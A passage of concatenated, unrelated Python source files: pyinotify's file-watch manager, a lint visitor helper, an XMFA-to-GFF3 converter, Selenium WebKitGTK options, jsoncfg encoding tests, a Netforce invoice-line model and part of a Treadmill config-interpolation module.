__init__(self, arg_lst): """ Examples: ef1 = ExcludeFilter(["^/etc/rc.*", "^/etc/hostname"]) ef2 = ExcludeFilter("/my/path/exclude.lst") Where exclude.lst contains: ^/etc/rc.* ^/etc/hostname @param arg_lst: is either a list of patterns or a filename from which patterns will be loaded. @type arg_lst: list of str or str """ if isinstance(arg_lst, str): lst = self._load_patterns_from_file(arg_lst) elif isinstance(arg_lst, list): lst = arg_lst else: raise TypeError self._lregex = [] for regex in lst: self._lregex.append(re.compile(regex, re.UNICODE)) def _load_patterns_from_file(self, filename): lst = [] with open(filename, 'r') as file_obj: for line in file_obj.readlines(): # Trim leading an trailing whitespaces pattern = line.strip() if not pattern or pattern.startswith('#'): continue lst.append(pattern) return lst def _match(self, regex, path): return regex.match(path) is not None def __call__(self, path): """ @param path: Path to match against provided regexps. @type path: str @return: Return True if path has been matched and should be excluded, False otherwise. @rtype: bool """ for regex in self._lregex: if self._match(regex, path): return True return False class WatchManagerError(Exception): """ WatchManager Exception. Raised on error encountered on watches operations. """ def __init__(self, msg, wmd): """ @param msg: Exception string's description. @type msg: string @param wmd: This dictionary contains the wd assigned to paths of the same call for which watches were successfully added. @type wmd: dict """ self.wmd = wmd Exception.__init__(self, msg) class WatchManager: """ Provide operations for watching files and directories. Its internal dictionary is used to reference watched items. When used inside threaded code, one must instanciate as many WatchManager instances as there are ThreadedNotifier instances. """ def __init__(self, exclude_filter=lambda path: False): """ Initialization: init inotify, init watch manager dictionary. Raise OSError if initialization fails. @param exclude_filter: boolean function, returns True if current path must be excluded from being watched. Convenient for providing a common exclusion filter for every call to add_watch. @type exclude_filter: callable object """ self._exclude_filter = exclude_filter self._wmd = {} # watch dict key: watch descriptor, value: watch self._fd = LIBC.inotify_init() # inotify's init, file descriptor if self._fd < 0: err = 'Cannot initialize new instance of inotify Errno=%s' raise OSError(err % strerrno()) def get_fd(self): """ Return assigned inotify's file descriptor. @return: File descriptor. @rtype: int """ return self._fd def get_watch(self, wd): """ Get watch from provided watch descriptor wd. @param wd: Watch descriptor. @type wd: int """ return self._wmd.get(wd) def del_watch(self, wd): """ Remove watch entry associated to watch descriptor wd. @param wd: Watch descriptor. @type wd: int """ try: del self._wmd[wd] except KeyError as err: log.error(str(err)) @property def watches(self): """ Get a reference on the internal watch manager dictionary. @return: Internal watch manager dictionary. @rtype: dict """ return self._wmd def __format_path(self, path): """ Format path to its internal (stored in watch manager) representation. """ # path must be a unicode string (str) and is just normalized. return os.path.normpath(path) def __add_watch(self, path, mask, proc_fun, auto_add, exclude_filter): """ Add a watch on path, build a Watch object and insert it in the watch manager dictionary. Return the wd value. """ path = self.__format_path(path) # path to a bytes string. This conversion seems to be required because # ctypes.create_string_buffer seems to manipulate bytes # strings representations internally. # Moreover it seems that LIBC.inotify_add_watch does not work very # well when it receives an ctypes.create_unicode_buffer instance as # argument. However wd are _always_ indexed with their original # unicode paths in wmd. byte_path = path.encode(sys.getfilesystemencoding()) wd_ = LIBC.inotify_add_watch(self._fd, ctypes.create_string_buffer(byte_path), mask) if wd_ < 0: return wd_ watch_ = Watch(wd=wd_, path=path, mask=mask, proc_fun=proc_fun, auto_add=auto_add, exclude_filter=exclude_filter) self._wmd[wd_] = watch_ log.debug('New %s', watch_) return wd_ def __glob(self, path, do_glob): if do_glob: return glob.iglob(path) else: return [path] def add_watch(self, path, mask, proc_fun=None, rec=False, auto_add=False, do_glob=False, quiet=True, exclude_filter=None): """ Add watch(s) on the provided |path|(s) with associated |mask| flag value and optionally with a processing |proc_fun| function and recursive flag |rec| set to True. All |path| components _must_ be str (i.e. unicode) objects. If |path| is already watched it is ignored, but if it is called with option rec=True a watch is put on each one of its not-watched subdirectory. @param path: Path to watch, the path can either be a file or a directory. Also accepts a sequence (list) of paths. @type path: string or list of strings @param mask: Bitmask of events. @type mask: int @param proc_fun: Processing object. @type proc_fun: function or ProcessEvent instance or instance of one of its subclasses or callable object. @param rec: Recursively add watches from path on all its subdirectories, set to False by default (doesn't follows symlinks in any case). @type rec: bool @param auto_add: Automatically add watches on newly created directories in watched parent |path| directory. @type auto_add: bool @param do_glob: Do globbing on pathname (see standard globbing module for more informations). @type do_glob: bool @param quiet: if False raises a WatchManagerError exception on error. See example not_quiet.py. @type quiet: bool @param exclude_filter: predicate (boolean function), which returns True if the current path must be excluded from being watched. This argument has precedence over exclude_filter passed to the class' constructor. @type exclude_filter: callable object @return: dict of paths associated to watch descriptors. A wd value is positive if the watch was added sucessfully, otherwise the value is negative. If the path was invalid or was already watched it is not included into this returned dictionary. @rtype: dict of {str: int} """ ret_ = {} # return {path: wd, ...} if exclude_filter is None: exclude_filter = self._exclude_filter # normalize args as list elements for npath in self.__format_param(path): # Require that path be a unicode string if not isinstance(npath, str): ret_[path] = -3 continue # unix pathname pattern expansion for apath in self.__glob(npath, do_glob): # recursively list subdirs according to rec param for rpath in self.__walk_rec(apath, rec): if self.get_wd(rpath) is not None: # We decide to ignore paths already inserted into # the watch manager. Need to be removed with rm_watch() # first. Or simply call update_watch() to update it. continue if not exclude_filter(rpath): wd = ret_[rpath] = self.__add_watch(rpath, mask, proc_fun, auto_add, exclude_filter) if wd < 0: err = 'add_watch: cannot watch %s WD=%d Errno=%s' err = err % (rpath, wd, strerrno()) if quiet: log.error(err) else: raise WatchManagerError(err, ret_) else: # Let's say -2 means 'explicitely excluded # from watching'. ret_[rpath] = -2 return ret_ def __get_sub_rec(self, lpath): """ Get every wd from self._wmd if its path is under the path of one (at least) of those in lpath. Doesn't follow symlinks. @param lpath: list of watch descriptor @type lpath: list of int @return: list of watch descriptor @rtype: list of int """ for d in lpath: root = self.get_path(d) if root is not None: # always keep root yield d else: # if invalid continue # nothing else to expect if not os.path.isdir(root): continue # normalization root = os.path.normpath(root) # recursion lend = len(root) for iwd in self._wmd.items(): cur = iwd[1].path pref = os.path.commonprefix([root, cur]) if root == os.sep or (len(pref) == lend and \ len(cur) > lend and \ cur[lend] == os.sep): yield iwd[1].wd def update_watch(self, wd, mask=None, proc_fun=None, rec=False, auto_add=False, quiet=True): """ Update existing watch descriptors |wd|. The |mask| value, the processing object |proc_fun|, the recursive param |rec| and the |auto_add| and |quiet| flags can all be updated. @param wd: Watch Descriptor to update. Also accepts a list of watch descriptors. @type wd: int or list of int @param mask: Optional new bitmask of events. @type mask: int @param proc_fun: Optional new processing function. @type proc_fun: function or ProcessEvent instance or instance of one of its subclasses or callable object. @param rec: Optionally adds watches recursively on all subdirectories contained into |wd| directory. @type rec: bool @param auto_add: Automatically adds watches on newly created directories in the watch's path corresponding to |wd|. @type auto_add: bool @param quiet: If False raises a WatchManagerError exception on error. See example not_quiet.py @type quiet: bool @return: dict of watch descriptors associated to booleans values. True if the corresponding wd has been successfully updated, False otherwise. @rtype: dict of {int: bool} """ lwd = self.__format_param(wd) if rec: lwd = self.__get_sub_rec(lwd) ret_ = {} # return {wd: bool, ...} for awd in lwd: apath = self.get_path(awd) if not apath or awd < 0: err = 'update_watch: invalid WD=%d' % awd if quiet: log.error(err) continue raise WatchManagerError(err, ret_) if mask: addw = LIBC.inotify_add_watch # apath is always stored as unicode string so encode it to # bytes. byte_path = apath.encode(sys.getfilesystemencoding()) wd_ = addw(self._fd, ctypes.create_string_buffer(byte_path), mask) if wd_ < 0: ret_[awd] = False err = 'update_watch: cannot update %s WD=%d Errno=%s' err = err % (apath, wd_, strerrno()) if quiet: log.error(err) continue raise WatchManagerError(err, ret_) assert(awd == wd_) if proc_fun or auto_add: watch_ = self._wmd[awd] if proc_fun: watch_.proc_fun = proc_fun if auto_add: watch_.auto_add = auto_add ret_[awd] = True log.debug('Updated watch - %s', self._wmd[awd]) return ret_ def __format_param(self, param): """ @param param: Parameter. @type param: string or int @return: wrap param. @rtype: list of type(param) """ if isinstance(param, list): for p_ in param: yield p_ else: yield param def get_wd(self, path): """ Returns the watch descriptor associated to path. This method presents a prohibitive cost, always prefer to keep the WD returned by add_watch(). If the path is unknown it returns None. @param path: Path. @type path: str @return: WD or None. @rtype: int or None """ path = self.__format_path(path) for iwd in self._wmd.items(): if iwd[1].path == path: return iwd[0] def get_path(self, wd): """ Returns the path associated to WD, if WD is unknown it returns None. @param wd: Watch descriptor. @type wd: int @return: Path or None. @rtype: string or None """ watch_ = self._wmd.get(wd) if watch_ is not None: return watch_.path def __walk_rec(self, top, rec): """ Yields each subdirectories of top, doesn't follow symlinks. If rec is false, only yield top. @param top: root directory. @type top: string @param rec: recursive flag. @type rec: bool @return: path of one subdirectory. @rtype: string """ if not rec or os.path.islink(top) or not os.path.isdir(top): yield top else: for root, dirs, files in os.walk(top): yield root def rm_watch(self, wd, rec=False, quiet=True): """ Removes watch(s). @param wd: Watch Descriptor of the file or directory to unwatch. Also accepts a list of WDs. @type wd: int or list of int. @param rec: Recursively removes watches on every already watched subdirectories and subfiles. @type rec: bool @param quiet: If False raises a WatchManagerError exception on error. See example not_quiet.py @type quiet: bool @return: dict of watch descriptors associated to booleans values. True if the corresponding wd has been successfully removed, False otherwise. @rtype: dict of {int: bool} """ lwd = self.__format_param(wd) if rec: lwd = self.__get_sub_rec(lwd) ret_ = {} # return {wd: bool, ...} for awd in lwd: # remove watch wd_ = LIBC.inotify_rm_watch(self._fd, awd) if wd_ < 0: ret_[awd] = False err = 'rm_watch: cannot remove WD=%d Errno=%s' % (awd, strerrno()) if quiet: log.error(err) continue raise WatchManagerError(err, ret_) ret_[awd] = True log.debug('Watch WD=%d (%s) removed', awd, self.get_path(awd)) return ret_ def watch_transient_file(self, filename, mask, proc_class): """ Watch a transient file, which will be created and deleted frequently over time (e.g. pid file). @attention: Currently under the call to this function it is not possible to correctly watch the events triggered into the same base directory than the directory where is located this watched transient file. For instance it would be wrong to make these two successive calls: wm.watch_transient_file('/var/run/foo.pid', ...) and wm.add_watch('/var/run/', ...) @param filename: Filename. @type filename: string @param mask: Bitmask of events, should contain IN_CREATE and IN_DELETE. @type mask: int @param proc_class: ProcessEvent (or of one of its subclass), beware of accepting a ProcessEvent's instance as argument into __init__, see transient_file.py example for more details. @type proc_class: ProcessEvent's instance or of one of its subclasses. @return: Same as add_watch(). @rtype: Same as add_watch(). """ dirname = os.path.dirname(filename) if dirname == '': return {} # Maintains coherence with add_watch() basename = os.path.basename(filename) # Assuming we are watching at least for IN_CREATE and IN_DELETE mask |= IN_CREATE | IN_DELETE def cmp_name(event): if getattr(event, 'name') is None: return False return basename == event.name return self.add_watch(dirname, mask, proc_fun=proc_class(ChainIfTrue(func=cmp_name)), rec=False, auto_add=False, do_glob=False, exclude_filter=lambda path: False) class RawOutputFormat: """ Format string representations. """ def __init__(self, format=None): self.format = format or {} def simple(self, s, attribute): if not isinstance(s, str): s = str(s) return (self.format.get(attribute, '') + s + self.format.get('normal', '')) def punctuation(self, s): """Punctuation color.""" return self.simple(s, 'normal') def field_value(self, s): """Field value color.""" return self.simple(s, 'purple') def field_name(self, s): """Field name color.""" return self.simple(s, 'blue') def class_name(self, s): """Class name color.""" return self.format.get('red', '') + self.simple(s, 'bold') output_format = RawOutputFormat() class ColoredOutputFormat(RawOutputFormat): """ Format colored string representations. """ def __init__(self): f = {'normal': '\033[0m', 'black': '\033[30m', 'red': '\033[31m', 'green': '\033[32m', 'yellow': '\033[33m', 'blue': '\033[34m', 'purple': '\033[35m', 'cyan': '\033[36m', 'bold': '\033[1m', 'uline': '\033[4m', 'blink': '\033[5m', 'invert': '\033[7m'} RawOutputFormat.__init__(self, f) def compatibility_mode(): """ Use this function to turn on the compatibility mode. The compatibility mode is used to improve compatibility with Pyinotify 0.7.1 (or older) programs. The compatibility mode provides additional variables 'is_dir', 'event_name', 'EventsCodes.IN_*' and 'EventsCodes.ALL_EVENTS' as Pyinotify 0.7.1 provided. Do not call this function from new programs!! Especially if there are developped for Pyinotify >= 0.8.x. """ setattr(EventsCodes, 'ALL_EVENTS', ALL_EVENTS) for evname in globals(): if evname.startswith('IN_'): setattr(EventsCodes, evname, globals()[evname]) global COMPATIBILITY_MODE COMPATIBILITY_MODE = True def command_line(): """ By default the watched path is '/tmp' and all types of events are monitored. Events monitoring serves forever, type c^c to stop it. """ from optparse import OptionParser usage = "usage: %prog [options] [path1] [path2] [pathn]" parser = OptionParser(usage=usage) parser.add_option("-v", "--verbose", action="store_true", dest="verbose", help="Verbose mode") parser.add_option("-r", "--recursive", action="store_true", dest="recursive", help="Add watches recursively on paths") parser.add_option("-a", "--auto_add", action="store_true", dest="auto_add", help="Automatically add watches on new directories") parser.add_option("-e", "--events-list", metavar="EVENT[,...]", dest="events_list", help=("A comma-separated list of events to watch for - " "see the documentation for valid options (defaults" " to everything)")) parser.add_option("-s", "--stats", action="store_true", dest="stats", help="Display dummy statistics") parser.add_option("-V", "--version", action="store_true", dest="version", help="Pyinotify version") parser.add_option("-f", "--raw-format", action="store_true", dest="raw_format", help="Disable enhanced output format.") (options, args) = parser.parse_args() if options.verbose: log.setLevel(10) if options.version: print(__version__) if not options.raw_format: global output_format output_format = ColoredOutputFormat() if len(args) < 1: path = '/tmp' # default watched path else: path = args # watch manager instance wm = WatchManager() # notifier instance and init if options.stats: notifier = Notifier(wm, default_proc_fun=Stats(), read_freq=5) else: notifier = Notifier(wm, default_proc_fun=PrintAllEvents()) # What mask to apply mask = 0 if options.events_list: events_list = options.events_list.split(',') for ev in events_list: evcode = EventsCodes.ALL_FLAGS.get(ev, 0) if evcode: mask |= evcode else: parser.error("The event '%s' specified with option -e" " is not valid" % ev) else: mask = ALL_EVENTS # stats cb_fun = None if options.stats: def cb(s): sys.stdout.write(repr(s.proc_fun())) sys.stdout.write('\n') sys.stdout.write(str(s.proc_fun())) sys.stdout.write('\n') sys.stdout.flush() cb_fun = cb log.debug('Start monitoring %s, (press c^c to halt pyinotify)' % path) wm.add_watch(path, mask, rec=options.recursive, auto_add=options.auto_add) # Loop forever (until sigint signal get caught) notifier.loop(callback=cb_fun) if __name__ == '__main__': command_line()
# vim: ts=4 sw=4 expandtab """ This is an abstract module for visiting specific nodes. This is useed to traverse the tree to generate warnings. """ def visit(event, *args): """ This decorator is used to indicate which nodes the function should examine. The function should accept (self, node) and return the relevant node or None. """ def _decorate(fn): fn._visit_event = event fn._visit_nodes = args return fn return _decorate def make_visitors(visitors, klasses): """ Searches klasses for all member functions decorated with @visit and fills a dictionary that looks like: visitors = { 'event_name': { 'node_type' : [func1, func2] } } """ assert isinstance(visitors, dict) # Intantiate an instance of each class for klass in klasses: if klass.__name__.lower() != klass.__name__: raise ValueError, 'class names must be lowercase' if not klass.__doc__: raise ValueError, 'missing docstring on class %s' % klass.__name__ # Look for functions with the "_visit_nodes" property. visitor = klass() for func in [getattr(visitor, name) for name in dir(visitor)]: event_visitors = None for node_kind in getattr(func, '_visit_nodes', ()): # Group visitors by event (e.g. push vs pop) if not event_visitors: try: event_visitors = visitors[func._visit_event] except KeyError: event_visitors = visitors[func._visit_event] = {} # Map from node_kind to the function try: event_visitors[node_kind].append(func) except KeyError: event_visitors[node_kind] = [func] return visitors
#!/usr/bin/env python import argparse import logging import sys from BCBio import GFF from Bio import SeqIO from Bio.Seq import Seq from Bio.SeqFeature import ( FeatureLocation, SeqFeature ) from Bio.SeqRecord import SeqRecord logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) # Patch bcbio gff to work around url encoding issue. This is clearly # sub-optimal but we should transition to the newer library. def _new_format_keyvals(self, keyvals): return ";".join(["%s=%s" % (k, ",".join(v)) for (k, v) in sorted(keyvals.items())]) GFF.GFFOutput.GFF3Writer._format_keyvals = _new_format_keyvals def parse_xmfa(xmfa): """Simple XMFA parser until https://github.com/biopython/biopython/pull/544 """ current_lcb = [] current_seq = {} for line in xmfa.readlines(): if line.startswith('#'): continue if line.strip() == '=': if 'id' in current_seq: current_lcb.append(current_seq) current_seq = {} yield current_lcb current_lcb = [] else: line = line.strip() if line.startswith('>'): if 'id' in current_seq: current_lcb.append(current_seq) current_seq = {} data = line.strip().split() id, loc = data[1].split(':') start, end = loc.split('-') current_seq = { 'rid': '_'.join(data[1:]), 'id': id, 'start': int(start), 'end': int(end), 'strand': 1 if data[2] == '+' else -1, 'seq': '' } else: current_seq['seq'] += line.strip() def _percent_identity(a, b): """Calculate % identity, ignoring gaps in the host sequence """ match = 0 mismatch = 0 for char_a, char_b in zip(list(a), list(b)): if char_a == '-': continue if char_a == char_b: match += 1 else: mismatch += 1 if match + mismatch == 0: return 0 return 100 * float(match) / (match + mismatch) def _id_tn_dict(sequences): """Figure out sequence IDs """ label_convert = {} if sequences is not None: if len(sequences) == 1: for i, record in enumerate(SeqIO.parse(sequences[0], 'fasta')): label_convert[str(i + 1)] = record.id else: for i, sequence in enumerate(sequences): for record in SeqIO.parse(sequence, 'fasta'): label_convert[str(i + 1)] = record.id continue return label_convert def convert_xmfa_to_gff3(xmfa_file, relative_to='1', sequences=None, window_size=1000): label_convert = _id_tn_dict(sequences) lcbs = parse_xmfa(xmfa_file) records = [SeqRecord(Seq("A"), id=label_convert.get(relative_to, relative_to))] for lcb in lcbs: ids = [seq['id'] for seq in lcb] # Doesn't match part of our sequence if relative_to not in ids: continue # Skip sequences that are JUST our "relative_to" genome if len(ids) == 1: continue parent = [seq for seq in lcb if seq['id'] == relative_to][0] others = [seq for seq in lcb if seq['id'] != relative_to] for other in others: other['feature'] = SeqFeature( FeatureLocation(parent['start'], parent['end'] + 1), type="match", strand=parent['strand'], qualifiers={ "source": "progressiveMauve", "Target": " ".join(map(str, [label_convert.get(other['id'], other['id']), other['start'], other['end'], '+' if other['strand'] > 0 else '-'])), "ID": label_convert.get(other['id'], 'xmfa_' + other['rid']) } ) for i in range(0, len(lcb[0]['seq']), window_size): block_seq = parent['seq'][i:i + window_size] real_window_size = len(block_seq) real_start = abs(parent['start']) - parent['seq'][0:i].count('-') + i real_end = real_start + real_window_size - block_seq.count('-') if (real_end - real_start) < 10: continue if parent['start'] < 0: strand = -1 else: strand = 1 for other in others: pid = _percent_identity(block_seq, other['seq'][i:i + real_window_size]) # Ignore 0% identity sequences if pid == 0: continue # Support for Biopython 1.68 and above, which removed sub_features if not hasattr(other['feature'], "sub_features"): other['feature'].sub_features = [] other['feature'].sub_features.append( SeqFeature( FeatureLocation(real_start, real_end), type="match_part", strand=strand, qualifiers={ "source": "progressiveMauve", 'score': pid } ) ) for other in others: records[0].features.append(other['feature']) return records if __name__ == '__main__': parser = argparse.ArgumentParser(description='Convert XMFA alignments to gff3', prog='xmfa2gff3') parser.add_argument('xmfa_file', type=argparse.FileType('r'), help='XMFA File') parser.add_argument('--window_size', type=int, help='Window size for analysis', default=1000) parser.add_argument('--relative_to', type=str, help='Index of the parent sequence in the MSA', default='1') parser.add_argument('--sequences', type=argparse.FileType('r'), nargs='+', help='Fasta files (in same order) passed to parent for reconstructing proper IDs') parser.add_argument('--version', action='version', version='%(prog)s 1.0') args = parser.parse_args() result = convert_xmfa_to_gff3(**vars(args)) GFF.write(result, sys.stdout)
# Licensed to the Software Freedom Conservancy (SFC) under one # or more contributor license agreements. See the NOTICE file # distributed with this work for additional information # regarding copyright ownership. The SFC licenses this file # to you under the Apache License, Version 2.0 (the # "License"); you may not use this file except in compliance # with the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, # software distributed under the License is distributed on an # "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY # KIND, either express or implied. See the License for the # specific language governing permissions and limitations # under the License. from selenium.webdriver.common.desired_capabilities import DesiredCapabilities class Options(object): KEY = 'webkitgtk:browserOptions' def __init__(self): self._binary_location = '' self._arguments = [] self._overlay_scrollbars_enabled = True @property def binary_location(self): """ Returns the location of the browser binary otherwise an empty string """ return self._binary_location @binary_location.setter def binary_location(self, value): """ Allows you to set the browser binary to launch :Args: - value : path to the browser binary """ self._binary_location = value @property def arguments(self): """ Returns a list of arguments needed for the browser """ return self._arguments def add_argument(self, argument): """ Adds an argument to the list :Args: - Sets the arguments """ if argument: self._arguments.append(argument) else: raise ValueError("argument can not be null") @property def overlay_scrollbars_enabled(self): """ Returns whether overlay scrollbars should be enabled """ return self._overlay_scrollbars_enabled @overlay_scrollbars_enabled.setter def overlay_scrollbars_enabled(self, value): """ Allows you to enable or disable overlay scrollbars :Args: - value : True or False """ self._overlay_scrollbars_enabled = value def to_capabilities(self): """ Creates a capabilities with all the options that have been set and returns a dictionary with everything """ webkitgtk = DesiredCapabilities.WEBKITGTK.copy() browser_options = {} if self.binary_location: browser_options["binary"] = self.binary_location if self.arguments: browser_options["args"] = self.arguments browser_options["useOverlayScrollbars"] = self.overlay_scrollbars_enabled webkitgtk[Options.KEY] = browser_options return webkitgtk
from unittest import TestCase from mock import patch, MagicMock from jsoncfg.compatibility import python2 from jsoncfg.text_encoding import ( detect_encoding_and_remove_bom, decode_utf_text_buffer, load_utf_text_file ) class TestEncodingFunctions(TestCase): def test_detect_encoding_and_remove_bom(self): encoded_decoded_pairs = ( (b'\xef\xbb\xbfUTF', u'UTF'), (b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', u'UTF'), (b'\0\0\xfe\xff\0\0\0U\0\0\0T\0\0\0F', u'UTF'), (b'\xff\xfeU\0T\0F\0', u'UTF'), (b'\xfe\xff\0U\0T\0F', u'UTF'), (b'UTF', u'UTF'), ) for encoded, decoded in encoded_decoded_pairs: buf, encoding = detect_encoding_and_remove_bom(encoded) self.assertEqual(buf.decode(encoding), decoded) def test_detect_encoding_and_remove_bom_with_non_bytes_buf(self): self.assertRaisesRegexp(TypeError, r'buf should be a bytes instance but it is a', detect_encoding_and_remove_bom, u'non_bytes_buf') def test_decode_text_buffer(self): self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=False), u'UTF') if python2: # Testing use_utf8_strings=True/False with buf=utf8/utf16. -> 4 cases. self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=False), u'UTF') self.assertEqual(decode_utf_text_buffer(b'\xef\xbb\xbfUTF', use_utf8_strings=True), b'UTF') self.assertEqual(decode_utf_text_buffer(b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', use_utf8_strings=False), u'UTF') self.assertEqual(decode_utf_text_buffer(b'\xff\xfe\0\0U\0\0\0T\0\0\0F\0\0\0', use_utf8_strings=True), b'UTF') def test_load_utf_text_file_filename(self): with patch('jsoncfg.text_encoding.open', create=True) as mock_open: mock_file = MagicMock() mock_open.return_value.__enter__.return_value = mock_file mock_file.read.return_value = b'file_contents' text = load_utf_text_file('fake.txt', use_utf8_strings=False) self.assertEqual(text, u'file_contents') mock_open.assert_called_with('fake.txt', 'rb') mock_file.read.assert_called_with() def test_load_utf_text_file_fileobject(self): mock_file = MagicMock() mock_file.read.return_value = b'file_contents' text = load_utf_text_file(mock_file, use_utf8_strings=False) self.assertEqual(text, u'file_contents') mock_file.read.assert_called_with()
# Copyright (c) 2012-2015 Netforce Co. Ltd. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files (the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and/or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions: # # The above copyright notice and this permission notice shall be included in all # copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, # EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF # MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. # IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, # DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR # OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE # OR OTHER DEALINGS IN THE SOFTWARE. from netforce.model import Model, fields, get_model class InvoiceLine(Model): _name = "account.invoice.line" _fields = { "invoice_id": fields.Many2One("account.invoice", "Invoice", required=True, on_delete="cascade"), "product_id": fields.Many2One("product", "Product"), "description": fields.Text("Description", required=True), "qty": fields.Decimal("Qty"), "uom_id": fields.Many2One("uom", "UoM"), "unit_price": fields.Decimal("Unit Price", scale=6), "discount": fields.Decimal("Disc %"), # XXX: rename to discount_percent later "discount_amount": fields.Decimal("Disc Amt"), "account_id": fields.Many2One("account.account", "Account", condition=[["type", "!=", "view"]]), "tax_id": fields.Many2One("account.tax.rate", "Tax Rate", on_delete="restrict"), "amount": fields.Decimal("Amount", required=True), "invoice_date": fields.Date("Invoice Date", function="_get_related", function_context={"path": "invoice_id.date"}), "invoice_contact_id": fields.Many2One("contact", "Invoice Partner", function="_get_related", function_context={"path": "invoice_id.contact_id"}), "purch_id": fields.Many2One("purchase.order", "Purchase Order"), "track_id": fields.Many2One("account.track.categ", "Track-1", condition=[["type", "=", "1"]]), "track2_id": fields.Many2One("account.track.categ", "Track-2", condition=[["type", "=", "2"]]), "amount_discount": fields.Decimal("Discount", function="get_discount"), "related_id": fields.Reference([["sale.order", "Sales Order"], ["purchase.order", "Purchase Order"], ["production.order","Production Order"], ["project", "Project"], ["job", "Service Order"], ["service.contract", "Service Contract"], ["work.time","Work Time"]], "Related To"), "sale_id": fields.Many2One("sale.order", "Sale Order"), "purchase_id": fields.Many2One("purchase.order","Purchase Order"), } def create(self, vals, **kw): id = super(InvoiceLine, self).create(vals, **kw) sale_id = vals.get("sale_id") if sale_id: get_model("sale.order").function_store([sale_id]) purch_id = vals.get("purch_id") if purch_id: get_model("purchase.order").function_store([purch_id]) return id def write(self, ids, vals, **kw): sale_ids = [] purch_ids = [] for obj in self.browse(ids): if obj.sale_id: sale_ids.append(obj.sale_id.id) if obj.purch_id: purch_ids.append(obj.purch_id.id) super(InvoiceLine, self).write(ids, vals, **kw) sale_id = vals.get("sale_id") if sale_id: sale_ids.append(sale_id) purch_id = vals.get("purch_id") if purch_id: purch_ids.append(purch_id) if sale_ids: get_model("sale.order").function_store(sale_ids) if purch_ids: get_model("purchase.order").function_store(purch_ids) def delete(self, ids, **kw): sale_ids = [] purch_ids = [] for obj in self.browse(ids): if obj.sale_id: sale_ids.append(obj.sale_id.id) if obj.purch_id: purch_ids.append(obj.purch_id.id) super(InvoiceLine, self).delete(ids, **kw) if sale_ids: get_model("sale.order").function_store(sale_ids) if purch_ids: get_model("purchase.order").function_store(purch_ids) def get_discount(self, ids, context={}): vals = {} for obj in self.browse(ids): amt = (obj.qty or 0) * (obj.unit_price or 0) if obj.discount: amt *= (1 - obj.discount / 100) if obj.discount_amount: amt -= obj.discount_amount vals[obj.id] = amt return vals InvoiceLine.register()
"""Treadmill bootstrap module. """ from __future__ import absolute_import from __future__ import division from __future__ import print_function from __future__ import unicode_literals import logging import os import jinja2 import six from treadmill import utils _LOGGER = logging.getLogger(__name__) def render(value, params): """Renders text, interpolating params. """ return str(jinja2.Template(value).render(params)) def interpolate_service_conf(resource_path, service_conf, name, params): """Interpolates the service config. """ params['name'] = name new_service_conf = {'name': name} if 'command' not in service_conf: raise Exception( 'Service def did not include command: %s' % resource_path ) new_service_conf['command'] = _interpolate_scalar( service_conf.get('command'), params) monitor_policy = service_conf.get('monitor_policy', None) if monitor_policy is not None: monitor_policy = _interpolate_dict(monitor_policy, params) if 'tombstone' not in monitor_policy or \ 'path' not in monitor_policy['tombstone']: raise Exception( 'Service def ombstone path missing: %s' % resource_path ) tombstone_path = monitor_policy['tombstone']['path'] tombstone_path = _interpolate_scalar(tombstone_path, params) tombstone_id = monitor_policy['tombstone'].get('id', name) tombstone_id = _interpolate_scalar(tombstone_id, params) new_policy = { 'limit': int(monitor_policy.get('limit', 0)), 'interval': int(monitor_policy.get('interval', 60)), 'tombstone': { 'uds': False, 'path': tombstone_path, 'id': tombstone_id, 'no_exit_info': monitor_policy['tombstone'].get('no_exit_info', False) } } monitor_policy = new_policy new_service_conf['monitor_policy'] = monitor_policy new_service_conf['userid'] = _interpolate_scalar( service_conf.get('user', 'root'), params) new_service_conf['downed'] = service_conf.get('downed', False) new_service_conf['environ_dir'] = _interpolate_scalar( service_conf.get('environ_dir', None), params) new_service_conf['environ'] = _interpolate( service_conf.get('environ', None), params) new_service_conf['notification_fd'] = service_conf.get( 'notification_fd', None) new_service_conf['call_before_run'] = _interpolate(service_conf.get( 'call_before_run', None), params) new_service_conf['call_before_finish'] = _interpolate(service_conf.get( 'call_before_finish', None), params) new_service_conf['logger_args'] = service_conf.get('logger_args', None) files = [] data_dir = service_conf.get('data_dir', None) if data_dir is not None: for item in utils.get_iterable(data_dir): if 'path' not in item: continue file = { 'path': item['path'] } content = '' if 'content' in item: content = _interpolate_scalar(item['content'], params) file['content'] = content file['executable'] = item.get('executable', False) files.append(file) new_service_conf['data_dir'] = files del params['name'] _LOGGER.debug('Service config for %s: %r', name, new_service_conf) return new_service_conf def _interpolate_dict(value, params): """Recursively interpolate each value in parameters. """ result = {} target = dict(value) counter = 0 while counter < 100: counter += 1 result = { k: _interpolate(v, params) for k, v in six.iteritems(target) } if result == target: break target = dict(result) else: raise Exception('Too many recursions: %s %s' % (value, params)) return result def _interpolate_list(value, params): """Interpolate each of the list element. """ return [_interpolate(member, params) for member in value] def _interpolate_scalar(value, params): """Interpolate string value by rendering the template. """ if isinstance(value, six.string_types): return render(value, params) else: # Do not interpolate numbers. return value def _interpolate(value, params=None): """Interpolate the value, switching by the value type. """ if params is None: params = value try: if isinstance(value, list): return _interpolate_list(value, params) if isinstance(value, dict): return _interpolate_dict(value, params) return _interpolate_scalar(value, params) except Exception: _LOGGER.critical('error interpolating: %s %s', value, params) raise def interpolate(value, params=None): """Interpolate value. """ return 